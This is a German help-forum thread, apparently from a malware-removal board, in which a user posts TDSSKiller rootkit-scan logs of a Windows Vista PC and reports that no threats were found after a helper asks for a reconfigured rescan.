14:27:00.0108 1440 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
14:27:00.0139 1440 [ D4E6D91C1349B7BFB3599A6ADA56851B ] C:\Windows\system32\services.exe
14:27:00.0139 1440 [Global] - ok
14:27:00.0139 1440 ================ Scan MBR ==================================
14:27:00.0155 1440 [ 5C616939100B85E558DA92B899A0FC36 ] \Device\Harddisk0\DR0
14:27:01.0301 1440 \Device\Harddisk0\DR0 - ok
14:27:01.0311 1440 [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk1\DR1
14:27:01.0321 1440 \Device\Harddisk1\DR1 - ok
14:27:01.0321 1440 [ 8F558EB6672622401DA993E1E865C861 ] \Device\Harddisk2\DR2
14:27:01.0331 1440 \Device\Harddisk2\DR2 - ok
14:27:01.0331 1440 ================ Scan VBR ==================================
14:27:01.0341 1440 [ 961EA6BC3F5CD34DA67B2EEE8AA84D1B ] \Device\Harddisk0\DR0\Partition1
14:27:01.0341 1440 \Device\Harddisk0\DR0\Partition1 - ok
14:27:01.0381 1440 [ 758AD88425527B05E4FA98631C162C08 ] \Device\Harddisk0\DR0\Partition2
14:27:01.0381 1440 \Device\Harddisk0\DR0\Partition2 - ok
14:27:01.0391 1440 [ EFF1ECE495ECBDEA78E34410A05FC2D3 ] \Device\Harddisk0\DR0\Partition3
14:27:01.0391 1440 \Device\Harddisk0\DR0\Partition3 - ok
14:27:01.0401 1440 [ D894F5CF2FC97000C4CD292863AEACC0 ] \Device\Harddisk1\DR1\Partition1
14:27:01.0401 1440 \Device\Harddisk1\DR1\Partition1 - ok
14:27:01.0411 1440 [ B40BC0A08101F64916E605AE52C91653 ] \Device\Harddisk2\DR2\Partition1
14:27:01.0411 1440 \Device\Harddisk2\DR2\Partition1 - ok
14:27:01.0411 1440 ============================================================
14:27:01.0411 1440 Scan finished
14:27:01.0411 1440 ============================================================
14:27:01.0431 3652 Detected object count: 0
14:27:01.0431 3652 Actual detected object count: 0
14:27:42.0124 4116 Deinitialize success

markusg · 19.02.2013, 17:03

hi prüfe die Bilder der Anleitung noch mal, konfiguriere den TDSS killer und scanne erneut

martinbu · 19.02.2013, 18:05

Oh, das hatte ich übersehen. Es sind allerdings wieder keine Dateien gefunden worden. Hier die neue Logfile.

Zitat:

18:03:43.0871 5560 TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42
18:03:43.0965 5560 ============================================================
18:03:43.0965 5560 Current date / time: 2013/02/19 18:03:43.0965
18:03:43.0965 5560 SystemInfo:
18:03:43.0965 5560
18:03:43.0965 5560 OS Version: 6.0.6002 ServicePack: 2.0
18:03:43.0965 5560 Product type: Workstation
18:03:43.0966 5560 ComputerName: TUS-PC
18:03:43.0966 5560 UserName: TuS
18:03:43.0966 5560 Windows directory: C:\Windows
18:03:43.0966 5560 System windows directory: C:\Windows
18:03:43.0966 5560 Processor architecture: Intel x86
18:03:43.0966 5560 Number of processors: 2
18:03:43.0966 5560 Page size: 0x1000
18:03:43.0966 5560 Boot type: Normal boot
18:03:43.0966 5560 ============================================================
18:03:45.0317 5560 Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
18:03:45.0319 5560 Drive \Device\Harddisk1\DR1 - Size: 0x7470C06000 (465.76 Gb), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
18:03:45.0321 5560 Drive \Device\Harddisk2\DR2 - Size: 0x1D1C0F00000 (1863.01 Gb), SectorSize: 0x200, Cylinders: 0x3B601, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
18:03:45.0322 5560 ============================================================
18:03:45.0322 5560 \Device\Harddisk0\DR0:
18:03:45.0323 5560 MBR partitions:
18:03:45.0323 5560 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x1BDC3FC1
18:03:45.0323 5560 \Device\Harddisk0\DR0\Partition2: MBR, Type 0xC, StartLBA 0x1BDC4000, BlocksNum 0x200800
18:03:45.0323 5560 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x1BFC4970, BlocksNum 0x1201000
18:03:45.0323 5560 \Device\Harddisk1\DR1:
18:03:45.0324 5560 MBR partitions:
18:03:45.0324 5560 \Device\Harddisk1\DR1\Partition1: MBR, Type 0xC, StartLBA 0x3F, BlocksNum 0x3A384C02
18:03:45.0324 5560 \Device\Harddisk2\DR2:
18:03:45.0324 5560 MBR partitions:
18:03:45.0324 5560 \Device\Harddisk2\DR2\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0xE8E07000
18:03:45.0324 5560 ============================================================
18:03:45.0338 5560 C: <-> \Device\Harddisk0\DR0\Partition1
18:03:45.0365 5560 D: <-> \Device\Harddisk0\DR0\Partition2
18:03:45.0432 5560 E: <-> \Device\Harddisk0\DR0\Partition3
18:03:45.0469 5560 G: <-> \Device\Harddisk2\DR2\Partition1
18:03:45.0469 5560 H: <-> \Device\Harddisk1\DR1\Partition1
18:03:45.0469 5560 ============================================================
18:03:45.0469 5560 Initialize success
18:03:45.0469 5560 ============================================================
18:03:55.0154 5696 ============================================================
18:03:55.0154 5696 Scan started
18:03:55.0154 5696 Mode: Manual; SigCheck; TDLFS;
18:03:55.0154 5696 ============================================================
18:03:56.0339 5696 ================ Scan system memory ========================
18:03:56.0339 5696 System memory - ok
18:03:56.0339 5696 ================ Scan services =============================
18:03:56.0620 5696 [ AEF9EE4451D5C46370142CB06D0F3591 ] Accelerometer C:\Windows\system32\DRIVERS\Accelerometer.sys
18:03:56.0729 5696 Accelerometer - ok
18:03:56.0760 5696 [ 82B296AE1892FE3DBEE00C9CF92F8AC7 ] ACPI C:\Windows\system32\drivers\acpi.sys
18:03:56.0776 5696 ACPI - ok
18:03:56.0806 5696 [ BF9DE454F80A1516D4D582520B2D6EDD ] ADIHdAudAddService C:\Windows\system32\drivers\ADIHdAud.sys
18:03:56.0996 5696 ADIHdAudAddService - ok
18:03:57.0086 5696 [ D19C4EE2AC7C47B8F5F84FFF1A789D8A ] AdobeARMservice C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
18:03:57.0106 5696 AdobeARMservice - ok
18:03:57.0206 5696 [ EC807244904FA170C299AB06D87FBDBE ] AdobeFlashPlayerUpdateSvc C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
18:03:57.0216 5696 AdobeFlashPlayerUpdateSvc - ok
18:03:57.0276 5696 [ 2EDC5BBAC6C651ECE337BDE8ED97C9FB ] adp94xx C:\Windows\system32\drivers\adp94xx.sys
18:03:57.0326 5696 adp94xx - ok
18:03:57.0376 5696 [ B84088CA3CDCA97DA44A984C6CE1CCAD ] adpahci C:\Windows\system32\drivers\adpahci.sys
18:03:57.0406 5696 adpahci - ok
18:03:57.0426 5696 [ 7880C67BCCC27C86FD05AA2AFB5EA469 ] adpu160m C:\Windows\system32\drivers\adpu160m.sys
18:03:57.0446 5696 adpu160m - ok
18:03:57.0456 5696 [ 9AE713F8E30EFC2ABCCD84904333DF4D ] adpu320 C:\Windows\system32\drivers\adpu320.sys
18:03:57.0486 5696 adpu320 - ok
18:03:57.0516 5696 [ 30EB9BCF0D1E4EDD3905AE003AC0C1AC ] AEADIFilters C:\Windows\system32\AEADISRV.EXE
18:03:57.0566 5696 AEADIFilters - ok
18:03:57.0596 5696 [ 9D1FDA9E086BA64E3C93C9DE32461BCF ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
18:03:57.0696 5696 AeLookupSvc - ok
18:03:57.0766 5696 [ 3911B972B55FEA0478476B2E777B29FA ] AFD C:\Windows\system32\drivers\afd.sys
18:03:57.0876 5696 AFD - ok
18:03:57.0936 5696 [ 9C9D3B7A05445B1AB2DF4D0C4D6B77E8 ] AgereModemAudio C:\Program Files\LSI SoftModem\agrsmsvc.exe
18:03:57.0986 5696 AgereModemAudio - ok
18:03:58.0036 5696 [ 3712986CC3ABF0DC656B43525B9D1279 ] AgereSoftModem C:\Windows\system32\DRIVERS\AGRSM.sys
18:03:58.0176 5696 AgereSoftModem - ok
18:03:58.0236 5696 [ EF23439CDD587F64C2C1B8825CEAD7D8 ] agp440 C:\Windows\system32\drivers\agp440.sys
18:03:58.0266 5696 agp440 - ok
18:03:58.0346 5696 [ AE1FDF7BF7BB6C6A70F67699D880592A ] aic78xx C:\Windows\system32\drivers\djsvs.sys
18:03:58.0366 5696 aic78xx - ok
18:03:58.0386 5696 [ A1545B731579895D8CC44FC0481C1192 ] ALG C:\Windows\System32\alg.exe
18:03:58.0516 5696 ALG - ok
18:03:58.0536 5696 [ 90395B64600EBB4552E26E178C94B2E4 ] aliide C:\Windows\system32\drivers\aliide.sys
18:03:58.0556 5696 aliide - ok
18:03:58.0596 5696 [ 2B13E304C9DFDFA5EB582F6A149FA2C7 ] amdagp C:\Windows\system32\drivers\amdagp.sys
18:03:58.0616 5696 amdagp - ok
18:03:58.0636 5696 [ 0577DF1D323FE75A739C787893D300EA ] amdide C:\Windows\system32\drivers\amdide.sys
18:03:58.0666 5696 amdide - ok
18:03:58.0696 5696 [ DC487885BCEF9F28EECE6FAC0E5DDFC5 ] AmdK7 C:\Windows\system32\drivers\amdk7.sys
18:03:58.0935 5696 AmdK7 - ok
18:03:58.0966 5696 [ 0CA0071DA4315B00FC1328CA86B425DA ] AmdK8 C:\Windows\system32\drivers\amdk8.sys
18:03:59.0029 5696 AmdK8 - ok
18:03:59.0091 5696 [ 466A0D95960DAD3222C896D2CEA99993 ] AntiVirSchedulerService C:\Program Files\Avira\AntiVir Desktop\sched.exe
18:03:59.0138 5696 AntiVirSchedulerService - ok
18:03:59.0169 5696 [ A489BE6BB0AA1FF406B488B60542314B ] AntiVirService C:\Program Files\Avira\AntiVir Desktop\avguard.exe
18:03:59.0185 5696 AntiVirService - ok
18:03:59.0226 5696 [ C6D704C7F0434DC791AAC37CAC4B6E14 ] Appinfo C:\Windows\System32\appinfo.dll
18:03:59.0276 5696 Appinfo - ok
18:03:59.0356 5696 [ F401929EE0CC92BFE7F15161CA535383 ] Apple Mobile Device C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
18:03:59.0366 5696 Apple Mobile Device - ok
18:03:59.0406 5696 [ 5F673180268BB1FDB69C99B6619FE379 ] arc C:\Windows\system32\drivers\arc.sys
18:03:59.0436 5696 arc - ok
18:03:59.0466 5696 [ 957F7540B5E7F602E44648C7DE5A1C05 ] arcsas C:\Windows\system32\drivers\arcsas.sys
18:03:59.0496 5696 arcsas - ok
18:03:59.0536 5696 [ 53B202ABEE6455406254444303E87BE1 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
18:03:59.0596 5696 AsyncMac - ok
18:03:59.0626 5696 [ 1F05B78AB91C9075565A9D8A4B880BC4 ] atapi C:\Windows\system32\drivers\atapi.sys
18:03:59.0636 5696 atapi - ok
18:03:59.0666 5696 [ 68E2A1A0407A66CF50DA0300852424AB ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
18:03:59.0697 5696 AudioEndpointBuilder - ok
18:03:59.0705 5696 [ 68E2A1A0407A66CF50DA0300852424AB ] Audiosrv C:\Windows\System32\Audiosrv.dll
18:03:59.0729 5696 Audiosrv - ok
18:03:59.0762 5696 [ D5541F0AFB767E85FC412FC609D96A74 ] avgntflt C:\Windows\system32\DRIVERS\avgntflt.sys
18:03:59.0794 5696 avgntflt - ok
18:03:59.0821 5696 [ 7D967A682D4694DF7FA57D63A2DB01FE ] avipbb C:\Windows\system32\DRIVERS\avipbb.sys
18:03:59.0859 5696 avipbb - ok
18:03:59.0877 5696 [ 271CFD1A989209B1964E24D969552BF7 ] avkmgr C:\Windows\system32\DRIVERS\avkmgr.sys
18:03:59.0906 5696 avkmgr - ok
18:03:59.0939 5696 [ 0A5E8178EFF1D8F109A95235AEB7D76F ] azvusb C:\Windows\system32\DRIVERS\azvusb.sys
18:03:59.0983 5696 azvusb - ok
18:04:00.0081 5696 [ 67E506B75BD5326A3EC7B70BD014DFB6 ] Beep C:\Windows\system32\drivers\Beep.sys
18:04:00.0114 5696 Beep - ok
18:04:00.0159 5696 [ C789AF0F724FDA5852FB9A7D3A432381 ] BFE C:\Windows\System32\bfe.dll
18:04:00.0219 5696 BFE - ok
18:04:00.0277 5696 [ 93952506C6D67330367F7E7934B6A02F ] BITS C:\Windows\System32\qmgr.dll
18:04:00.0338 5696 BITS - ok
18:04:00.0343 5696 blbdrive - ok
18:04:00.0413 5696 [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
18:04:00.0450 5696 Bonjour Service - ok
18:04:00.0497 5696 [ 35F376253F687BDE63976CCB3F2108CA ] bowser C:\Windows\system32\DRIVERS\bowser.sys
18:04:00.0571 5696 bowser - ok
18:04:00.0623 5696 [ 9F9ACC7F7CCDE8A15C282D3F88B43309 ] BrFiltLo C:\Windows\system32\drivers\brfiltlo.sys
18:04:00.0682 5696 BrFiltLo - ok
18:04:00.0706 5696 [ 56801AD62213A41F6497F96DEE83755A ] BrFiltUp C:\Windows\system32\drivers\brfiltup.sys
18:04:00.0776 5696 BrFiltUp - ok
18:04:00.0806 5696 [ A3629A0C4226F9E9C72FAAEEBC3AD33C ] Browser C:\Windows\System32\browser.dll
18:04:00.0858 5696 Browser - ok
18:04:00.0872 5696 [ B304E75CFF293029EDDF094246747113 ] Brserid C:\Windows\system32\drivers\brserid.sys
18:04:00.0937 5696 Brserid - ok
18:04:00.0950 5696 [ 203F0B1E73ADADBBB7B7B1FABD901F6B ] BrSerWdm C:\Windows\system32\drivers\brserwdm.sys
18:04:01.0035 5696 BrSerWdm - ok
18:04:01.0064 5696 [ BD456606156BA17E60A04E18016AE54B ] BrUsbMdm C:\Windows\system32\drivers\brusbmdm.sys
18:04:01.0140 5696 BrUsbMdm - ok
18:04:01.0166 5696 [ AF72ED54503F717A43268B3CC5FAEC2E ] BrUsbSer C:\Windows\system32\drivers\brusbser.sys
18:04:01.0260 5696 BrUsbSer - ok
18:04:01.0295 5696 [ 6D39C954799B63BA866910234CF7D726 ] BthEnum C:\Windows\system32\DRIVERS\BthEnum.sys
18:04:01.0372 5696 BthEnum - ok
18:04:01.0406 5696 [ AD07C1EC6665B8B35741AB91200C6B68 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys
18:04:01.0527 5696 BTHMODEM - ok
18:04:01.0586 5696 [ 5904EFA25F829BF84EA6FB045134A1D8 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys
18:04:01.0633 5696 BthPan - ok
18:04:01.0664 5696 [ 611FF3F2F095C8D4A6D4CFD9DCC09793 ] BTHPORT C:\Windows\system32\Drivers\BTHport.sys
18:04:01.0758 5696 BTHPORT - ok
18:04:01.0820 5696 [ A4C8377FA4A994E07075107DBE2E3DCE ] BthServ C:\Windows\System32\bthserv.dll
18:04:01.0867 5696 BthServ - ok
18:04:01.0883 5696 [ D330803EAB2A15CAEC7F011F1D4CB30E ] BTHUSB C:\Windows\system32\Drivers\BTHUSB.sys
18:04:01.0914 5696 BTHUSB - ok
18:04:01.0961 5696 [ 7ADD03E75BEB9E6DD102C3081D29840A ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
18:04:02.0007 5696 cdfs - ok
18:04:02.0054 5696 [ 6B4BFFB9BECD728097024276430DB314 ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
18:04:02.0101 5696 cdrom - ok
18:04:02.0148 5696 [ 312EC3E37A0A1F2006534913E37B4423 ] CertPropSvc C:\Windows\System32\certprop.dll
18:04:02.0195 5696 CertPropSvc - ok
18:04:02.0226 5696 [ DA8E0AFC7BAA226C538EF53AC2F90897 ] circlass C:\Windows\system32\drivers\circlass.sys
18:04:02.0273 5696 circlass - ok
18:04:02.0319 5696 [ D7659D3B5B92C31E84E53C1431F35132 ] CLFS C:\Windows\system32\CLFS.sys
18:04:02.0335 5696 CLFS - ok
18:04:02.0382 5696 [ 8EE772032E2FE80A924F3B8DD5082194 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
18:04:02.0397 5696 clr_optimization_v2.0.50727_32 - ok
18:04:02.0453 5696 [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
18:04:02.0493 5696 clr_optimization_v4.0.30319_32 - ok
18:04:02.0523 5696 [ 99AFC3795B58CC478FBBBCDC658FCB56 ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys
18:04:02.0593 5696 CmBatt - ok
18:04:02.0623 5696 [ 45201046C776FFDAF3FC8A0029C581C8 ] cmdide C:\Windows\system32\drivers\cmdide.sys
18:04:02.0643 5696 cmdide - ok
18:04:02.0653 5696 [ 6AFEF0B60FA25DE07C0968983EE4F60A ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys
18:04:02.0673 5696 Compbatt - ok
18:04:02.0683 5696 COMSysApp - ok
18:04:02.0683 5696 [ 2A213AE086BBEC5E937553C7D9A2B22C ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
18:04:02.0703 5696 crcdisk - ok
18:04:02.0723 5696 [ 22A7F883508176489F559EE745B5BF5D ] Crusoe C:\Windows\system32\drivers\crusoe.sys
18:04:02.0793 5696 Crusoe - ok
18:04:02.0833 5696 [ F1E8C34892336D33EDDCDFE44E474F64 ] CryptSvc C:\Windows\system32\cryptsvc.dll
18:04:02.0873 5696 CryptSvc - ok
18:04:02.0923 5696 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] DcomLaunch C:\Windows\system32\rpcss.dll
18:04:02.0973 5696 DcomLaunch - ok
18:04:03.0023 5696 [ 622C41A07CA7E6DD91770F50D532CB6C ] DfsC C:\Windows\system32\Drivers\dfsc.sys
18:04:03.0073 5696 DfsC - ok
18:04:03.0193 5696 [ 2CC3DCFB533A1035B13DCAB6160AB38B ] DFSR C:\Windows\system32\DFSR.exe
18:04:03.0383 5696 DFSR - ok
18:04:03.0443 5696 [ 9028559C132146FB75EB7ACF384B086A ] Dhcp C:\Windows\System32\dhcpcsvc.dll
18:04:03.0483 5696 Dhcp - ok
18:04:03.0513 5696 [ 5D4AEFC3386920236A548271F8F1AF6A ] disk C:\Windows\system32\drivers\disk.sys
18:04:03.0543 5696 disk - ok
18:04:03.0573 5696 [ 57D762F6F5974AF0DA2BE88A3349BAAA ] Dnscache C:\Windows\System32\dnsrslvr.dll
18:04:03.0643 5696 Dnscache - ok
18:04:03.0673 5696 [ 324FD74686B1EF5E7C19A8AF49E748F6 ] dot3svc C:\Windows\System32\dot3svc.dll
18:04:03.0710 5696 dot3svc - ok
18:04:03.0762 5696 [ A622E888F8AA2F6B49E9BC466F0E5DEF ] DPS C:\Windows\system32\dps.dll
18:04:03.0805 5696 DPS - ok
18:04:03.0850 5696 [ 97FEF831AB90BEE128C9AF390E243F80 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
18:04:03.0894 5696 drmkaud - ok
18:04:03.0926 5696 [ C68AC676B0EF30CFBB1080ADCE49EB1F ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
18:04:03.0960 5696 DXGKrnl - ok
18:04:03.0987 5696 [ F88FB26547FD2CE6D0A5AF2985892C48 ] E1G60 C:\Windows\system32\DRIVERS\E1G60I32.sys
18:04:04.0070 5696 E1G60 - ok
18:04:04.0101 5696 [ C0B95E40D85CD807D614E264248A45B9 ] EapHost C:\Windows\System32\eapsvc.dll
18:04:04.0139 5696 EapHost - ok
18:04:04.0189 5696 [ 7F64EA048DCFAC7ACF8B4D7B4E6FE371 ] Ecache C:\Windows\system32\drivers\ecache.sys
18:04:04.0217 5696 Ecache - ok
18:04:04.0245 5696 [ E8F3F21A71720C84BCF423B80028359F ] elxstor C:\Windows\system32\drivers\elxstor.sys
18:04:04.0285 5696 elxstor - ok
18:04:04.0324 5696 [ 4E6B23DFC917EA39306B529B773950F4 ] EMDMgmt C:\Windows\system32\emdmgmt.dll
18:04:04.0397 5696 EMDMgmt - ok
18:04:04.0432 5696 [ 67058C46504BC12D821F38CF99B7B28F ] EventSystem C:\Windows\system32\es.dll
18:04:04.0502 5696 EventSystem - ok
18:04:04.0549 5696 [ 22B408651F9123527BCEE54B4F6C5CAE ] exfat C:\Windows\system32\drivers\exfat.sys
18:04:04.0596 5696 exfat - ok
18:04:04.0643 5696 [ 1E9B9A70D332103C52995E957DC09EF8 ] fastfat C:\Windows\system32\drivers\fastfat.sys
18:04:04.0705 5696 fastfat - ok
18:04:04.0767 5696 [ 63BDADA84951B9C03E641800E176898A ] fdc C:\Windows\system32\DRIVERS\fdc.sys
18:04:04.0814 5696 fdc - ok
18:04:04.0845 5696 [ 6629B5F0E98151F4AFDD87567EA32BA3 ] fdPHost C:\Windows\system32\fdPHost.dll
18:04:04.0877 5696 fdPHost - ok
18:04:04.0908 5696 [ 89ED56DCE8E47AF40892778A5BD31FD2 ] FDResPub C:\Windows\system32\fdrespub.dll
18:04:04.0939 5696 FDResPub - ok
18:04:04.0970 5696 [ A8C0139A884861E3AAE9CFE73B208A9F ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
18:04:04.0986 5696 FileInfo - ok
18:04:05.0017 5696 [ 0AE429A696AECBC5970E3CF2C62635AE ] Filetrace C:\Windows\system32\drivers\filetrace.sys
18:04:05.0058 5696 Filetrace - ok
18:04:05.0088 5696 [ 6603957EFF5EC62D25075EA8AC27DE68 ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys
18:04:05.0158 5696 flpydisk - ok
18:04:05.0188 5696 [ 01334F9EA68E6877C4EF05D3EA8ABB05 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
18:04:05.0218 5696 FltMgr - ok
18:04:05.0278 5696 [ 8CE364388C8ECA59B14B539179276D44 ] FontCache C:\Windows\system32\FntCache.dll
18:04:05.0348 5696 FontCache - ok
18:04:05.0438 5696 [ C7FBDD1ED42F82BFA35167A5C9803EA3 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
18:04:05.0458 5696 FontCache3.0.0.0 - ok
18:04:05.0478 5696 [ B972A66758577E0BFD1DE0F91AAA27B5 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
18:04:05.0548 5696 Fs_Rec - ok
18:04:05.0568 5696 [ 4E1CD0A45C50A8882616CAE5BF82F3C5 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
18:04:05.0588 5696 gagp30kx - ok
18:04:05.0638 5696 [ 8182FF89C65E4D38B2DE4BB0FB18564E ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
18:04:05.0658 5696 GEARAspiWDM - ok
18:04:05.0708 5696 [ CD5D0AEEE35DFD4E986A5AA1500A6E66 ] gpsvc C:\Windows\System32\gpsvc.dll
18:04:05.0778 5696 gpsvc - ok
18:04:05.0828 5696 [ 88A78635B41ED4B261365FADEB28FE81 ] HBtnKey C:\Windows\system32\DRIVERS\cpqbttn.sys
18:04:05.0858 5696 HBtnKey - ok
18:04:05.0898 5696 [ CB04C744BE0A61B1D648FAED182C3B59 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
18:04:05.0978 5696 HdAudAddService - ok
18:04:06.0008 5696 [ 062452B7FFD68C8C042A6261FE8DFF4A ] HDAudBus C:\Windows\system32\DRIVERS\HDAudBus.sys
18:04:06.0058 5696 HDAudBus - ok
18:04:06.0098 5696 [ 1338520E78D90154ED6BE8F84DE5FCEB ] HidBth C:\Windows\system32\drivers\hidbth.sys
18:04:06.0158 5696 HidBth - ok
18:04:06.0178 5696 [ FF3160C3A2445128C5A6D9B076DA519E ] HidIr C:\Windows\system32\drivers\hidir.sys
18:04:06.0228 5696 HidIr - ok
18:04:06.0258 5696 [ 84067081F3318162797385E11A8F0582 ] hidserv C:\Windows\system32\hidserv.dll
18:04:06.0288 5696 hidserv - ok
18:04:06.0338 5696 [ CCA4B519B17E23A00B826C55716809CC ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys
18:04:06.0388 5696 HidUsb - ok
18:04:06.0408 5696 [ D8AD255B37DA92434C26E4876DB7D418 ] hkmsvc C:\Windows\system32\kmsvc.dll
18:04:06.0458 5696 hkmsvc - ok
18:04:06.0478 5696 [ DF353B401001246853763C4B7AAA6F50 ] HpCISSs C:\Windows\system32\drivers\hpcisss.sys
18:04:06.0498 5696 HpCISSs - ok
18:04:06.0528 5696 [ 64637B65C90DF48C94BB9346AFB3AC61 ] hpdskflt C:\Windows\system32\DRIVERS\hpdskflt.sys
18:04:06.0548 5696 hpdskflt - ok
18:04:06.0608 5696 [ FDF273A845F1FFCCEADF363AAF47582F ] hpqwmiex C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
18:04:06.0628 5696 hpqwmiex - ok
18:04:06.0638 5696 [ DB8CF923DFD8DD336BEA7F439A627858 ] hpsrv C:\Windows\system32\Hpservice.exe
18:04:06.0648 5696 hpsrv - ok
18:04:06.0678 5696 [ 0EEECA26C8D4BDE2A4664DB058A81937 ] HTTP C:\Windows\system32\drivers\HTTP.sys
18:04:06.0735 5696 HTTP - ok
18:04:06.0746 5696 hwdatacard - ok
18:04:06.0770 5696 [ 324C2152FF2C61ABAE92D09F3CCA4D63 ] i2omp C:\Windows\system32\drivers\i2omp.sys
18:04:06.0787 5696 i2omp - ok
18:04:06.0829 5696 [ 22D56C8184586B7A1F6FA60BE5F5A2BD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys
18:04:06.0871 5696 i8042prt - ok
18:04:06.0910 5696 [ C957BF4B5D80B46C5017BF0101E6C906 ] iaStorV C:\Windows\system32\drivers\iastorv.sys
18:04:06.0936 5696 iaStorV - ok
18:04:07.0005 5696 [ 98477B08E61945F974ED9FDC4CB6BDAB ] idsvc C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
18:04:07.0088 5696 idsvc - ok
18:04:07.0170 5696 [ 0391268713612372E4E0ECEAADAD41D5 ] igfx C:\Windows\system32\DRIVERS\igdkmd32.sys
18:04:07.0334 5696 igfx - ok
18:04:07.0356 5696 [ 2D077BF86E843F901D8DB709C95B49A5 ] iirsp C:\Windows\system32\drivers\iirsp.sys
18:04:07.0379 5696 iirsp - ok
18:04:07.0421 5696 [ 9908D8A397B76CD8D31D0D383C5773C9 ] IKEEXT C:\Windows\System32\ikeext.dll
18:04:07.0496 5696 IKEEXT - ok
18:04:07.0522 5696 [ 97469037714070E45194ED318D636401 ] intelide C:\Windows\system32\drivers\intelide.sys
18:04:07.0543 5696 intelide - ok
18:04:07.0566 5696 [ 224191001E78C89DFA78924C3EA595FF ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
18:04:07.0629 5696 intelppm - ok
18:04:07.0700 5696 [ 9AC218C6E6105477484C6FDBE7D409A4 ] IPBusEnum C:\Windows\system32\ipbusenum.dll
18:04:07.0762 5696 IPBusEnum - ok
18:04:07.0809 5696 [ 62C265C38769B864CB25B4BCF62DF6C3 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
18:04:07.0856 5696 IpFilterDriver - ok
18:04:07.0887 5696 [ 1998BD97F950680BB55F55A7244679C2 ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
18:04:07.0949 5696 iphlpsvc - ok
18:04:07.0949 5696 IpInIp - ok
18:04:07.0980 5696 [ 40F34F8ABA2A015D780E4B09138B6C17 ] IPMIDRV C:\Windows\system32\drivers\ipmidrv.sys
18:04:08.0043 5696 IPMIDRV - ok
18:04:08.0074 5696 [ 8793643A67B42CEC66490B2A0CF92D68 ] IPNAT C:\Windows\system32\DRIVERS\ipnat.sys
18:04:08.0121 5696 IPNAT - ok
18:04:08.0183 5696 [ E6BE7A41A28D8F2DB174957454D32448 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
18:04:08.0324 5696 iPod Service - ok
18:04:08.0394 5696 [ 109C0DFB82C3632FBD11949B73AEEAC9 ] IRENUM C:\Windows\system32\drivers\irenum.sys
18:04:08.0454 5696 IRENUM - ok
18:04:08.0494 5696 [ 350FCA7E73CF65BCEF43FAE1E4E91293 ] isapnp C:\Windows\system32\drivers\isapnp.sys
18:04:08.0514 5696 isapnp - ok
18:04:08.0544 5696 [ 232FA340531D940AAC623B121A595034 ] iScsiPrt C:\Windows\system32\DRIVERS\msiscsi.sys
18:04:08.0564 5696 iScsiPrt - ok
18:04:08.0584 5696 [ BCED60D16156E428F8DF8CF27B0DF150 ] iteatapi C:\Windows\system32\drivers\iteatapi.sys
18:04:08.0614 5696 iteatapi - ok
18:04:08.0634 5696 [ 06FA654504A498C30ADCA8BEC4E87E7E ] iteraid C:\Windows\system32\drivers\iteraid.sys
18:04:08.0654 5696 iteraid - ok
18:04:08.0684 5696 [ 37605E0A8CF00CBBA538E753E4344C6E ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
18:04:08.0704 5696 kbdclass - ok
18:04:08.0744 5696 [ EDE59EC70E25C24581ADD1FBEC7325F7 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
18:04:08.0804 5696 kbdhid - ok
18:04:08.0834 5696 [ A3E186B4B935905B829219502557314E ] KeyIso C:\Windows\system32\lsass.exe
18:04:08.0904 5696 KeyIso - ok
